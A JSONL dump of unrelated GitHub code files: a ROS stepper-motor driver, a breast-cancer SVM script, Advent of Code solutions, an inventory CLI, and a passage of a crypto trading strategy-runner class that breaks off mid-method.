+{"seq_id":"5653541286","text":"#!/usr/bin/env python3\nimport RPi.GPIO as GPIO\nimport rospy\nfrom std_msgs.msg import String\nfrom std_msgs.msg import Int16MultiArray\nimport time\nfrom math import pi\nfrom math import copysign\n\nPINS_CONFIG = {\"STEP_L\": 18, \"DIR_L\": 4,\n \"STEP_R\": 20, \"DIR_R\": 16}\n\n\nclass motors ():\n def __init__(self, pins_config, init_speed=0):\n self.leftSub = rospy.Subscriber(\n \"/stepper_cmd\", Int16MultiArray, self.stepper_callback)\n #self.pi = pigpio_instance\n self.pins_config = pins_config\n self.init_pins()\n self.l_speed = init_speed\n self.r_speed = init_speed\n self.left_dir = bool(0)\n self.right_dir = bool(0)\n self.last_time_check_step_l = time.perf_counter()*1e6\n self.last_time_check_step_r = time.perf_counter()*1e6\n self.step_cur_state_l = bool(0)\n self.step_cur_state_r = bool(0)\n\n def init_pins(self):\n for key in self.pins_config:\n GPIO.setup(self.pins_config[key], GPIO.OUT)\n GPIO.output(self.pins_config[key], GPIO.LOW)\n\n def stepper_callback(self, msg):\n print(\"new data received\")\n received_d=msg.data\n right_d=bool(received_d[0])\n left_d=bool(received_d[1])\n self.r_speed=received_d[2]\n self.l_speed=received_d[3]\n if(self.right_dir != right_d):\n self.right_dir = right_d\n GPIO.output(self.pins_config[\"DIR_R\"], right_d)\n if(self.left_dir != left_d):\n self.left_dir = left_d\n GPIO.output(self.pins_config[\"DIR_L\"], left_d)\n\n def update_speed(self):\n \n #self.pi.get_current_tick()\n t_us_now = time.perf_counter()*1e6\n\n if (t_us_now- self.last_time_check_step_l >=self.l_speed) and (self.l_speed > 100):\n self.step_cur_state_l = not self.step_cur_state_l\n GPIO.output(self.pins_config[\"STEP_L\"], self.step_cur_state_l)\n self.last_time_check_step_l = t_us_now\n if (t_us_now- self.last_time_check_step_r >=self.r_speed) and (self.r_speed > 100):\n self.step_cur_state_r= not self.step_cur_state_r\n GPIO.output(self.pins_config[\"STEP_R\"], self.step_cur_state_r)\n self.last_time_check_step_r = t_us_now\n\n\nif __name__ == '__main__':\n try:\n rospy.init_node('motors_control', anonymous=True)\n GPIO.setmode(GPIO.BCM)\n rate = rospy.Rate(100000)\n steppers = motors(PINS_CONFIG, init_speed=0)\n# \n while not rospy.is_shutdown():\n steppers.update_speed()\n rate.sleep()\n GPIO.cleanup()\n except rospy.ROSInterruptException:\n GPIO.cleanup()\n","repo_name":"ahmedokasha000/aio_robot","sub_path":"src/stepper_driver_ros_jetson.py","file_name":"stepper_driver_ros_jetson.py","file_ext":"py","file_size_in_byte":2654,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"}
+{"seq_id":"72292257363","text":"import numpy as np #importing the numpy and pandas libraries\nimport pandas as pd\nfrom sklearn.model_selection import train_test_split #importing train test split to train the data\nfrom sklearn import svm #importing support vector machine\nimport pickle #importing pickle\ndf=pd.read_csv(\"breast_cancer.csv\") #firstly we load the file \nprint(df.head()) #then we check the first five rows\ndf.drop(\"id\" , axis=1 , inplace = True ) #then we drop unnecessary columns\ndf.drop(\"Unnamed: 32\" , axis = 1 , inplace = True )#drop unnecessary columns\nprint(df.head()) #then we check our dataset again\ndf[\"diagnosis\"] = 
df[\"diagnosis\"] . map ({\"M\" : 1 , \"B\" : 0}) #Since machine lerning only understands numbers we give labels to M and B\nx=df.drop(\"diagnosis\" , axis =1 , inplace = False) #then we split the data into x and y to train the module by them\ny=df[\"diagnosis\"] #y is our target\nnp.random.seed(42) # we write random seed so we can get the same values from random values\nx_train , x_test , y_train , y_test = train_test_split(x,y,test_size=0.2) #then we train the module\nmodel=svm.SVC() #save the module in a variable model\nmodel.fit(x_train,y_train) #train the module with x_train and y_train data\nprint(model.score(x_train,y_train)) #then we find the score of the model\nprint(model.score(x_test,y_test))\npickle.dump(model,open(\"Breast_cancer_classifer_model.pkl\" , \"wb\")) # then we save this model in a file so it can be accessed \nimport matplotlib.pyplot as plt\nimport seaborn as sns\nsns.heatmap(df.corr() , cbar= True)\nplt.show()\n\n","repo_name":"Cizzorz3/Breast_Cancer_Classification","sub_path":"Breast_Cancer_Model.py","file_name":"Breast_Cancer_Model.py","file_ext":"py","file_size_in_byte":1524,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"30868067991","text":"\"\"\" day_03.py -- Advent of Code 2020 Day 3: Toboggan Trajectory\n\n Author: Chris Bowman\n Last Modified: 12/3/2020\n License: MIT\n\"\"\"\n\nimport math\n\n\ndef part_1(data: list, slope: tuple) -> int:\n trees = 0\n right, down = (0, 0)\n while down < len(data):\n if data[down][right % len(data[0])] == '#':\n trees += 1\n right += slope[0]\n down += slope[1]\n return trees\n\n\ndef part_2(data: list, slopes) -> int:\n return math.prod(part_1(data, slope) for slope in slopes)\n\n\ndef main():\n d = open('../inputs/03').read().splitlines()\n slopes = [(1, 1), (3, 1), (5, 1), (7, 1), (1, 2)]\n print(part_1(d, slopes[1]))\n print(part_2(d, slopes))\n\n\nif __name__ == '__main__':\n main()\n","repo_name":"stereoabuse/Advent-of-Code-2020","sub_path":"solutions/day_03.py","file_name":"day_03.py","file_ext":"py","file_size_in_byte":731,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"34200227642","text":"from utils import timed\n\n# day 7 part 2 was a nightmare, just like last year's...\n\nwith open('inputs/2020-07.txt') as f:\n input_lines = f.read().splitlines()\n\ndef find_parent_bags(rules, color):\n possible_parent_bags = []\n for outer_bag, inner_bags in rules.items():\n if color in inner_bags.keys():\n possible_parent_bags.append(outer_bag)\n\n return possible_parent_bags + sum([find_parent_bags(rules, outer_bag) for outer_bag in possible_parent_bags], [])\n\n@timed\ndef part_one(input_lines):\n rules = {}\n for rule in input_lines:\n child_bags = ' '.join(rule.split(' ')[4:]).split(', ')\n outer_bag = ' '.join(rule.split(' ')[:2])\n child_bags_dict = {}\n for bag in child_bags:\n split_bag = bag.split(' ')\n if split_bag[0] == 'no':\n break\n child_bags_dict[' '.join(split_bag[1:3]).strip('.')] = int(split_bag[0])\n rules[outer_bag] = child_bags_dict\n\n return rules, len(set(find_parent_bags(rules, 'shiny gold')))\n\ndef product(array: list) -> int:\n res = 1\n for i in array:\n res *= i\n return res\n\ndef get_num_child_bags(rules, color, parent_bags_numlist):\n if len(rules[color]) == 0:\n return 0 # no more layers left, no more additional bags to add\n\n total_bag_counts = []\n for bag, count in rules[color].items():\n branch_count_list = parent_bags_numlist.copy() # duplicate the count list 
for the current branch\n current_layer_sum = count * product(branch_count_list)\n\n branch_count_list.append(count) # add this layer's count to the parent numlist for future layers\n future_layer_sum = get_num_child_bags(rules, bag, branch_count_list)\n total_bag_counts.append(current_layer_sum + future_layer_sum)\n\n return sum(total_bag_counts)\n\n@timed\ndef part_two(rules):\n return get_num_child_bags(rules, 'shiny gold', [1])\n\n\nrules, answer = part_one(input_lines)\nprint(answer)\nprint(part_two(rules))\n","repo_name":"SharpBit/adventofcode","sub_path":"2020/2020-07.py","file_name":"2020-07.py","file_ext":"py","file_size_in_byte":1981,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"16471209510","text":"import argparse\n\n\n# Do not change these lines.\n__winc_id__ = \"a2bc36ea784242e4989deb157d527ba0\"\n__human_name__ = \"superpy\"\n\n\n# Your code below this line.\n\n\ndef main():\n from helpers import today, yesterday, advance_today, products, stock, revenue, profit, buy, sell, valid_month, valid_date, lowercase\n\n parser = argparse.ArgumentParser(\n usage=\"python %(prog)s\", epilog=\"For subcommand help, enter 'python super.py -h'.\")\n subparsers = parser.add_subparsers(\n title=\"subcommands\", prog=\"python super.py\", dest=\"subcommand\")\n\n parser_today = subparsers.add_parser(\n \"today\", description=\"shows today's date and exit\", help=\"shows today's date and exit\")\n parser_today.set_defaults(func=today)\n\n parser_yesterday = subparsers.add_parser(\n \"yesterday\", description=\"shows yesterday's date and exit\", help=\"shows yesterday's date and exit\")\n parser_yesterday.set_defaults(func=yesterday)\n\n parser_advance_today = subparsers.add_parser(\n \"advance_today\", description=\"advance 'today' with n days and exit\", help=\"advance 'today' with n days and exit\")\n parser_advance_today.add_argument(\"days\", type=int, help=\"number of days\")\n parser_advance_today.set_defaults(func=advance_today)\n\n parser_products = subparsers.add_parser(\n \"products\", description=\"shows the offered products and exit\", help=\"shows the offered products and exit\")\n parser_products.add_argument(\n \"-csv\", action=\"store_const\", const=\"products.csv\", help=\"export the offered products to products.csv\")\n parser_products.add_argument(\n \"-excel\", action=\"store_const\", const=\"products.xlsx\", help=\"export the offered products to products.xlsx\")\n parser_products.set_defaults(func=products)\n\n parser_stock = subparsers.add_parser(\n \"stock\", description=\"shows the current stock and exit\", help=\"shows the current stock and exit\")\n parser_stock.add_argument(\n \"-csv\", action=\"store_const\", const=\"stock.csv\", help=\"export the current stock to stock.csv\")\n parser_stock.add_argument(\n \"-excel\", action=\"store_const\", const=\"stock.xlsx\", help=\"export the current stock to stock.xlsx\")\n parser_stock.set_defaults(func=stock)\n\n parser_revenue = subparsers.add_parser(\n \"revenue\", description=\"shows the revenue for period x and exit\", help=\"shows the revenue for period x and exit\")\n parser_revenue.add_argument(\n \"-today\", action=\"store_const\", const=\"today\", help=\"shows today's revenue\")\n parser_revenue.add_argument(\n \"-yesterday\", action=\"store_const\", const=\"yesterday\", help=\"shows yesterday's revenue\")\n parser_revenue.add_argument(\n \"-month\", type=valid_month,\n help=\"shows revenue of a month - e.g. 
JAN-2023\")\n parser_revenue.set_defaults(func=revenue)\n\n parser_profit = subparsers.add_parser(\n \"profit\", description=\"shows the profit for period x and exit\", help=\"shows the profit for period x and exit\")\n parser_profit.add_argument(\n \"-today\", action=\"store_const\", const=\"today\", help=\"shows today's profit\")\n parser_profit.add_argument(\n \"-yesterday\", action=\"store_const\", const=\"yesterday\", help=\"shows yesterday's profit\")\n parser_profit.add_argument(\n \"-month\", type=valid_month,\n help=\"shows profit of a month - e.g. JAN-2023\")\n parser_profit.set_defaults(func=profit)\n\n parser_buy = subparsers.add_parser(\n \"buy\", description=\"record a purchase in bought.csv and exit\", help=\"record a purchase in bought.csv and exit\")\n parser_buy.add_argument(\"product\", type=lowercase,\n help=\"product name - singular noun\")\n parser_buy.add_argument(\"date\", type=valid_date,\n help=\"purchase date - YYYY-MM-DD\")\n parser_buy.add_argument(\"price\", type=float,\n help=\"purchase price - floating point number\")\n parser_buy.add_argument(\"expiration\", type=valid_date,\n help=\"expiration date - YYYY-MM-DD\")\n parser_buy.add_argument(\"count\", type=int, help=\"product count - integer\")\n parser_buy.set_defaults(func=buy)\n\n parser_sell = subparsers.add_parser(\n \"sell\", description=\"record a sale in sold.csv and exit\", help=\"record a sale in sold.csv and exit\")\n parser_sell.add_argument(\"product\", type=lowercase,\n help=\"product name - singular noun\")\n parser_sell.add_argument(\"date\", type=valid_date,\n help=\"sale date - YYYY-MM-DD\")\n parser_sell.add_argument(\"price\", type=float,\n help=\"sale price - floating point number\")\n parser_sell.add_argument(\"count\", type=int, help=\"product count - integer\")\n parser_sell.set_defaults(func=sell)\n\n\n args = parser.parse_args()\n if args.subcommand is None:\n parser.print_help()\n else:\n args.func(args)\n\n\nif __name__ == \"__main__\":\n main()","repo_name":"RomuloPy/WincAcademy-repo","sub_path":"Back-end/superpy/super.py","file_name":"super.py","file_ext":"py","file_size_in_byte":4944,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"27057605053","text":"\"\"\"Strategy execution core.\n\nDefine the runner model for different strategy types.\n\"\"\"\n\nimport abc\nimport datetime\nimport time\nfrom contextlib import AbstractContextManager\nimport logging\nfrom io import StringIO\nfrom pprint import pformat\nfrom types import NoneType\n\nfrom typing import List, Optional, Tuple\n\nfrom tradeexecutor.state.types import BlockNumber\nfrom tradeexecutor.statistics.core import update_statistics\nfrom tradeexecutor.strategy.account_correction import check_accounts, UnexpectedAccountingCorrectionIssue\nfrom tradeexecutor.strategy.approval import ApprovalModel\nfrom tradeexecutor.strategy.cycle import CycleDuration\nfrom tradeexecutor.strategy.engine_version import TradingStrategyEngineVersion\nfrom tradeexecutor.strategy.execution_context import ExecutionContext\nfrom tradeexecutor.strategy.execution_model import ExecutionModel\nfrom tradeexecutor.strategy.sync_model import SyncMethodV0, SyncModel\nfrom tradeexecutor.strategy.run_state import RunState\nfrom tradeexecutor.strategy.output import output_positions, DISCORD_BREAK_CHAR, output_trades\nfrom tradeexecutor.strategy.pandas_trader.position_manager import PositionManager\nfrom tradeexecutor.strategy.pricing_model import PricingModelFactory, PricingModel\nfrom 
tradeexecutor.strategy.routing import RoutingModel, RoutingState\nfrom tradeexecutor.strategy.stop_loss import check_position_triggers\nfrom tradeexecutor.strategy.trading_strategy_universe import TradingStrategyUniverse\nfrom tradeexecutor.strategy.universe_model import StrategyExecutionUniverse\n\nfrom tradeexecutor.state.state import State\nfrom tradeexecutor.state.position import TradingPosition\nfrom tradeexecutor.state.trade import TradeExecution\nfrom tradeexecutor.state.reserve import ReservePosition\nfrom tradeexecutor.strategy.valuation import ValuationModelFactory, ValuationModel, revalue_state\n\nlogger = logging.getLogger(__name__)\n\n\nclass PreflightCheckFailed(Exception):\n \"\"\"Something was wrong with the datafeeds.\"\"\"\n\n\nclass StrategyRunner(abc.ABC):\n \"\"\"A base class for a strategy executor.\n\n Each different strategy type needs its own runner.\n Currently we have\n\n - :py:class:`tradeexecutor.strategy.pandas_trader.runner.PandasTraderRunner`\n\n - :py:class:`tradeexecutor.strategy.qstrader.runner.QSTraderRunner`\n\n TODO: Make user_supplied_routing_model non-optional after eliminating legacy code.\n \"\"\"\n\n def __init__(self,\n timed_task_context_manager: AbstractContextManager,\n execution_model: ExecutionModel,\n approval_model: ApprovalModel,\n valuation_model_factory: ValuationModelFactory,\n sync_model: Optional[SyncModel],\n pricing_model_factory: PricingModelFactory,\n execution_context: ExecutionContext,\n routing_model: Optional[RoutingModel] = None,\n run_state: Optional[RunState] = None,\n accounting_checks=False,\n unit_testing=False,\n trade_settle_wait=None,\n ):\n \"\"\"\n :param engine_version:\n Strategy execution version.\n\n Changes function arguments based on this.\n See `StrategyModuleInformation.trading_strategy_engine_version`.\n \"\"\"\n assert isinstance(execution_context, ExecutionContext)\n\n if sync_model is not None:\n assert isinstance(sync_model, SyncModel)\n\n self.timed_task_context_manager = timed_task_context_manager\n self.execution_model = execution_model\n self.approval_model = approval_model\n self.valuation_model_factory = valuation_model_factory\n self.sync_model = sync_model\n self.pricing_model_factory = pricing_model_factory\n self.routing_model = routing_model\n self.run_state = run_state\n self.execution_context = execution_context\n self.accounting_checks = accounting_checks\n self.unit_testing = unit_testing\n\n # We need to wait 60 seconds to read balances\n # after trades, but only in real trading;\n # Anvil and test nodes are immune to this AFAIK\n if unit_testing or not execution_context.mode.is_live_trading():\n self.trade_settle_wait = datetime.timedelta(0)\n else:\n self.trade_settle_wait = datetime.timedelta(seconds=60)\n\n logger.info(\n \"Created strategy runner %s, engine version %s, running mode %s\",\n self,\n self.execution_context.engine_version,\n self.execution_context.mode.name,\n )\n\n # If the planned and executed prices differ by more than this fraction,\n # log a warning in the post-execution output\n self.execution_warning_tolerance = 0.01\n\n def __repr__(self):\n \"\"\"Get a long presentation of internal runner state.\"\"\"\n dump = pformat(self.__dict__)\n return f\"<{self.__class__.__name__}\\n\" \\\n f\"{dump}\\n\" \\\n f\">\"\n\n @abc.abstractmethod\n def pretick_check(self, ts: datetime.datetime, universe: StrategyExecutionUniverse):\n \"\"\"Check the universe for good data before a strategy tick is executed.\n\n If there are data errors, then log and abort with helpful error messages.\n\n Only relevant for 
live trading; if backtesting data fails\n it can be diagnosed in the backtesting itself.\n\n :param client: Trading Strategy client to check server versions etc.\n\n :param universe: The currently constructed universe\n\n :param ts: Real-time clock signal or past clock timestamp in the case of unit testing\n\n :raise PreflightCheckFailed: In case we cannot go live\n \"\"\"\n pass\n\n def is_progress_report_needed(self) -> bool:\n \"\"\"Do we log the strategy steps to logger?\n\n - Disabled for backtesting to speed up\n\n - Can be enabled by hacking this function if backtesting needs debugging\n \"\"\"\n return self.execution_context.mode.is_live_trading() or self.execution_context.mode.is_unit_testing()\n\n def sync_portfolio(\n self,\n strategy_cycle_or_trigger_check_ts: datetime.datetime,\n universe: StrategyExecutionUniverse,\n state: State,\n debug_details: dict,\n end_block: BlockNumber | NoneType = None,\n ):\n \"\"\"Adjust portfolio balances based on the external events.\n\n External events include\n\n - Deposits\n\n - Withdrawals\n\n - Interest accrued\n\n - Token rebases\n\n :param strategy_cycle_or_trigger_check_ts:\n Timestamp for the event trigger\n\n :param universe:\n Loaded universe\n\n :param state:\n Current strategy state\n\n :param end_block:\n Sync until this block.\n\n If not given, sync to the latest block.\n\n :param debug_details:\n Dictionary of debug data that will be passed down to the callers\n\n \"\"\"\n assert isinstance(universe, StrategyExecutionUniverse), f\"Universe was {universe}\"\n reserve_assets = list(universe.reserve_assets)\n assert len(reserve_assets) > 0, \"No reserve assets available\"\n assert len(reserve_assets) == 1, f\"We only support strategies with a single reserve asset, got {reserve_assets}\"\n token = reserve_assets[0]\n assert token.decimals and token.decimals > 0, \"Reserve asset lacked decimals\"\n\n logger.info(\"sync_portfolio() starting at block %s\", end_block)\n\n balance_update_events = self.sync_model.sync_treasury(\n strategy_cycle_or_trigger_check_ts,\n state,\n supported_reserves=reserve_assets,\n end_block=end_block,\n )\n assert type(balance_update_events) == list\n logger.info(\"Received %d balance update events from the sync\", len(balance_update_events))\n for e in balance_update_events:\n logger.trade(\"Funding flow event: %s\", e)\n\n # Update the debug data for tests with our events\n debug_details[\"reserve_update_events\"] = balance_update_events\n debug_details[\"total_equity_at_start\"] = state.portfolio.get_total_equity()\n debug_details[\"total_cash_at_start\"] = state.portfolio.get_cash()\n\n # If we have any new deposits, let's refresh our stats right away\n # to reflect the new balances\n if len(balance_update_events) > 0:\n\n with self.timed_task_context_manager(\"sync_portfolio_stats_refresh\"):\n routing_state, pricing_model, valuation_model = self.setup_routing(universe)\n\n timestamp = strategy_cycle_or_trigger_check_ts\n\n # Re-value the portfolio with new deposits\n self.revalue_state(\n timestamp,\n state,\n valuation_model,\n )\n\n update_statistics(\n timestamp,\n state.stats,\n state.portfolio,\n self.execution_context.mode,\n strategy_cycle_or_wall_clock=timestamp,\n )\n\n def revalue_state(self, ts: datetime.datetime, state: State, valuation_model: ValuationModel):\n \"\"\"Revalue portfolio based on the latest prices.\"\"\"\n revalue_state(state, ts, valuation_model)\n logger.info(\"After revaluation at %s our portfolio value is %f USD\", ts, state.portfolio.get_total_equity())\n\n def 
collect_post_execution_data(\n self,\n execution_context: ExecutionContext,\n pricing_model: PricingModel,\n trades: List[TradeExecution]):\n \"\"\"Collect post execution data for all trades.\n\n - Collect prices after the execution\n - Mostly matters for failed execution only, but we collect for everything\n \"\"\"\n\n # Rerun price estimations for the latest block data\n # after the trade has been executed\n for t in trades:\n\n if execution_context.mode.is_live_trading():\n ts = datetime.datetime.utcnow()\n else:\n # Backtesting does not yet have a way\n # to simulate slippage\n ts = t.strategy_cycle_at\n\n # Credit supply pairs do not have pricing ATM\n if t.pair.is_spot():\n if t.is_buy():\n t.post_execution_price_structure = pricing_model.get_buy_price(ts, t.pair, t.planned_reserve)\n else:\n t.post_execution_price_structure = pricing_model.get_sell_price(ts, t.pair, -t.planned_quantity)\n elif t.pair.is_leverage() and t.is_short():\n spot_pair = t.pair.underlying_spot_pair\n if t.is_sell():\n t.post_execution_price_structure = pricing_model.get_buy_price(ts, spot_pair, t.planned_collateral_consumption)\n else:\n t.post_execution_price_structure = pricing_model.get_sell_price(ts, spot_pair, t.planned_quantity)\n\n #\n # Check if we got such bad trade execution that we should worry about it\n #\n\n if t.planned_reserve and t.executed_reserve:\n reserve_drift = abs((t.executed_reserve - t.planned_reserve) / t.planned_reserve)\n else:\n reserve_drift = 0\n\n if t.planned_quantity and t.executed_quantity:\n quantity_drift = abs((t.executed_quantity - t.planned_quantity) / t.planned_quantity)\n else:\n quantity_drift = 0\n\n if reserve_drift >= self.execution_warning_tolerance or quantity_drift >= self.execution_warning_tolerance:\n log_level = logging.WARNING\n else:\n log_level = logging.INFO\n\n logger.log(\n log_level,\n \"Trade quantity and reserve match for pre- and post-execution for: %s\\n Estimated reserve %s, executed reserve %s\\n Estimated quantity %s, executed quantity %s\\n Reserve drift %f %%, quantity drift %f %%\",\n t,\n t.planned_reserve,\n t.executed_reserve,\n t.planned_quantity,\n t.executed_quantity,\n reserve_drift * 100,\n quantity_drift * 100,\n )\n\n def on_clock(self,\n clock: datetime.datetime,\n universe: StrategyExecutionUniverse,\n pricing_model: PricingModel,\n state: State,\n debug_details: dict) -> List[TradeExecution]:\n \"\"\"Perform the core strategy decision cycle.\n\n :param clock:\n The current cycle timestamp\n\n :param universe:\n Our trading pairs and such. 
Refreshed before the cycle.\n\n :param pricing_model:\n When constructing trades, uses pricing model to estimate the cost of a trade.\n\n :param state:\n The current trade execution and portfolio status\n\n :return:\n List of new trades to execute\n \"\"\"\n return []\n\n def report_after_sync_and_revaluation(self, clock: datetime.datetime, universe: StrategyExecutionUniverse, state: State, debug_details: dict):\n buf = StringIO()\n portfolio = state.portfolio\n tick = debug_details.get(\"cycle\", 1)\n print(f\"Portfolio status (before rebalance), tick #{tick}\", file=buf)\n print(\"\", file=buf)\n print(f\"Total equity: ${portfolio.get_total_equity():,.2f}, in cash: ${portfolio.get_cash():,.2f}\", file=buf)\n print(f\"Life-time positions: {portfolio.next_position_id - 1}, trades: {portfolio.next_trade_id - 1}\", file=buf)\n print(DISCORD_BREAK_CHAR, file=buf)\n\n if len(portfolio.open_positions) > 0:\n print(f\"Currently open positions:\", file=buf)\n print(\"\", file=buf)\n output_positions(portfolio.open_positions.values(), buf)\n\n print(DISCORD_BREAK_CHAR, file=buf)\n else:\n logger.info(\"No open positions\")\n\n if portfolio.get_frozen_position_equity() > 0:\n print(f\"Frozen positions (${portfolio.get_frozen_position_equity():,.2f}):\", file=buf)\n print(\"\", file=buf)\n output_positions(portfolio.frozen_positions.values(), buf)\n\n print(DISCORD_BREAK_CHAR, file=buf)\n else:\n logger.info(\"No frozen positions\")\n\n print(\"Reserves:\", file=buf)\n print(\"\", file=buf)\n reserve: ReservePosition\n for reserve in state.portfolio.reserves.values():\n print(f\" {reserve.quantity:,.2f} {reserve.asset.token_symbol}\", file=buf)\n\n logger.trade(buf.getvalue())\n\n def report_before_execution(self, clock: datetime.datetime, universe: StrategyExecutionUniverse, state: State, trades: List[TradeExecution], debug_details: dict):\n buf = StringIO()\n\n if len(trades) > 0:\n print(\"New trades to be executed\", file=buf)\n print(\"\", file=buf)\n position: TradingPosition\n portfolio = state.portfolio\n output_trades(trades, portfolio, buf)\n else:\n print(\"No new trades\", file=buf)\n logger.trade(buf.getvalue())\n\n def report_after_execution(self, clock: datetime.datetime, universe: StrategyExecutionUniverse, state: State, debug_details: dict):\n buf = StringIO()\n portfolio = state.portfolio\n \n print(\"Portfolio status (after rebalance)\", file=buf)\n print(\"\", file=buf)\n print(f\"Total equity: ${portfolio.get_total_equity():,.2f}, Cash: ${portfolio.get_cash():,.2f}\", file=buf)\n\n print(DISCORD_BREAK_CHAR, file=buf)\n\n if len(portfolio.open_positions) > 0:\n print(f\"Opened/open positions:\", file=buf)\n print(\"\", file=buf)\n output_positions(portfolio.open_positions.values(), buf)\n\n print(DISCORD_BREAK_CHAR, file=buf)\n else:\n logger.info(\"No positions opened\")\n\n closed_positions = list(portfolio.get_positions_closed_at(clock))\n if len(closed_positions) > 0:\n print(f\"Closed positions:\", file=buf)\n output_positions(closed_positions, buf)\n\n print(DISCORD_BREAK_CHAR, file=buf)\n else:\n logger.info(\"The clock tick %s did not close any positions\", clock)\n\n print(\"Reserves:\", file=buf)\n print(\"\", file=buf)\n reserve: ReservePosition\n for reserve in state.portfolio.reserves.values():\n print(f\" {reserve.quantity:,.2f} {reserve.asset.token_symbol}\", file=buf)\n logger.trade(buf.getvalue())\n\n def report_strategy_thinking(self,\n strategy_cycle_timestamp: datetime.datetime,\n cycle: int,\n universe: TradingStrategyUniverse,\n state: State,\n trades: 
List[TradeExecution],\n debug_details: dict):\n \"\"\"Strategy admin helpers to understand a live running strategy.\n\n - Post latest variables\n\n - Draw the single pair strategy visualisation.\n\n :param strategy_cycle_timestamp:\n Real-time clock timestamp\n\n :param cycle:\n Cycle number\n\n :param universe:\n Current trading universe\n\n :param trades:\n Trades executed on this cycle\n\n :param state:\n Current execution state\n\n :param debug_details:\n Dict of random debug stuff\n \"\"\"\n\n def setup_routing(self, universe: StrategyExecutionUniverse) -> Tuple[RoutingState, PricingModel, ValuationModel]:\n \"\"\"Set up the routing state for this cycle.\n\n :param universe:\n The currently tradeable universe\n\n :return:\n Tuple(routing state, pricing model, valuation model)\n \"\"\"\n\n assert self.routing_model, \"Routing model not set\"\n\n # Get web3 connection, hot wallet\n routing_state_details = self.execution_model.get_routing_state_details()\n\n # Initialise the current routing state with execution details\n logger.info(\"Setting up routing.\\n\"\n \"Routing model is %s\\n\"\n \"Details are %s\\n\"\n \"Universe is %s\",\n self.routing_model,\n routing_state_details,\n universe,\n )\n routing_state = self.routing_model.create_routing_state(universe, routing_state_details)\n\n # Create a pricing model for assets\n pricing_model = self.pricing_model_factory(self.execution_model, universe, self.routing_model)\n\n assert pricing_model, \"pricing_model_factory did not return a value\"\n\n # Create a valuation model for positions\n valuation_model = self.valuation_model_factory(pricing_model)\n\n logger.debug(\"setup_routing(): routing_state: %s, pricing_model: %s, valuation_model: %s\",\n routing_state,\n pricing_model,\n valuation_model\n )\n\n return routing_state, pricing_model, valuation_model\n\n def check_balances_post_execution(\n self,\n universe: StrategyExecutionUniverse,\n state: State,\n ):\n \"\"\"Check that on-chain balances match our internal accounting after executing trades.\n\n - Crash the execution if the on-chain balance is not what we expect\n\n - Call after we have stored the execution state in the database\n \"\"\"\n\n # We cannot call the account check right after the trades,\n # as many low-quality nodes might still report old token balances\n # from eth_call\n logger.info(\"Waiting for on-chain balances to settle for %s before performing accounting checks\", self.trade_settle_wait)\n time.sleep(self.trade_settle_wait.total_seconds())\n\n # Double check we handled incoming trade balances correctly\n with self.timed_task_context_manager(\"check_accounts_post_trade\"):\n end_block = self.execution_model.get_safe_latest_block()\n logger.info(\"Post-trade accounts balance check for block %s\", end_block)\n self.check_accounts(universe, state, end_block=end_block)\n\n def tick(self,\n strategy_cycle_timestamp: datetime.datetime,\n universe: StrategyExecutionUniverse,\n state: State,\n debug_details: dict,\n cycle_duration: Optional[CycleDuration] = None,\n cycle: Optional[int] = None,\n ) -> dict:\n \"\"\"Execute the core functions of a strategy.\n\n TODO: This function is vulnerable to balance changes in the middle of execution.\n It's not possible to fix this until we have atomic rebalances.\n\n :param strategy_cycle_timestamp:\n Current timestamp of the execution cycle.\n\n :param universe:\n Loaded trading data\n\n :param state:\n The current state of the strategy (open position, past trades, visualisation)\n\n :param debug_details:\n Internal bunch of data used in unit 
testing\n\n :param cycle_duration:\n The current cycle duration (time between ticks).\n This may be specified in a strategy module, but can also be overridden for testing.\n This is used only for logging purposes.\n\n :param cycle:\n Strategy cycle number\n\n :param execution_context:\n Live or backtesting\n\n :return: Debug details dictionary where different subsystems can write diagnostics information about what happened during the cycle.\n Mostly useful for integration testing.\n \"\"\"\n\n assert isinstance(universe, StrategyExecutionUniverse)\n\n assert isinstance(strategy_cycle_timestamp, datetime.datetime)\n\n if cycle_duration not in (CycleDuration.cycle_unknown, CycleDuration.cycle_1s, None):\n assert strategy_cycle_timestamp.second == 0, f\"Cycle duration {cycle_duration}: Does not look like a cycle timestamp: {strategy_cycle_timestamp}, should be even minutes\"\n\n end_block = self.execution_model.get_safe_latest_block()\n\n logger.info(\"tick() at block %s\", end_block)\n\n friendly_cycle_duration = cycle_duration.value if cycle_duration else \"-\"\n with self.timed_task_context_manager(\"strategy_tick\", clock=strategy_cycle_timestamp, cycle_duration=friendly_cycle_duration):\n\n routing_state, pricing_model, valuation_model = self.setup_routing(universe)\n assert pricing_model, \"Routing did not provide pricing_model\"\n\n # Watch incoming deposits\n with self.timed_task_context_manager(\"sync_portfolio\"):\n self.sync_portfolio(strategy_cycle_timestamp, universe, state, debug_details, end_block)\n\n # Double check we handled deposits correctly\n with self.timed_task_context_manager(\"check_accounts_pre_trade\"):\n logger.info(\"Pre-trade accounts balance check\")\n self.check_accounts(universe, state, end_block)\n\n # Assign a new value for every existing position\n with self.timed_task_context_manager(\"revalue_portfolio\"):\n self.revalue_state(strategy_cycle_timestamp, state, valuation_model)\n\n # Log output\n if self.is_progress_report_needed():\n self.report_after_sync_and_revaluation(strategy_cycle_timestamp, universe, state, debug_details)\n\n # Check if we have any money to trade or not.\n # Otherwise we are going to crash with \"not enough USDC to open a trade\" errors\n execution_context = self.execution_context\n\n # TODO: Due to legacy reasons some tests assume they run with zero capital,\n # and we have a flag to check for it here\n if state.portfolio.has_trading_capital() or execution_context.mode.is_unit_testing():\n\n # Run the strategy cycle's main trading decision step\n with self.timed_task_context_manager(\"decide_trades\"):\n rebalance_trades = self.on_clock(\n strategy_cycle_timestamp,\n universe,\n pricing_model,\n state,\n debug_details\n )\n assert type(rebalance_trades) == list\n debug_details[\"rebalance_trades\"] = rebalance_trades\n\n # Make some useful diagnostics output for log files to troubleshoot if something\n # went wrong internally\n _, last_point_at = state.visualisation.get_timestamp_range()\n logger.info(\"We have %d new trades, %d total visualisation points, last visualisation point at %s\",\n len(rebalance_trades),\n state.visualisation.get_total_points(),\n last_point_at\n )\n\n # Check that we did not get duplicate trades for some reason,\n # like API bugs\n trade_set = set()\n for t in rebalance_trades:\n assert t not in trade_set, 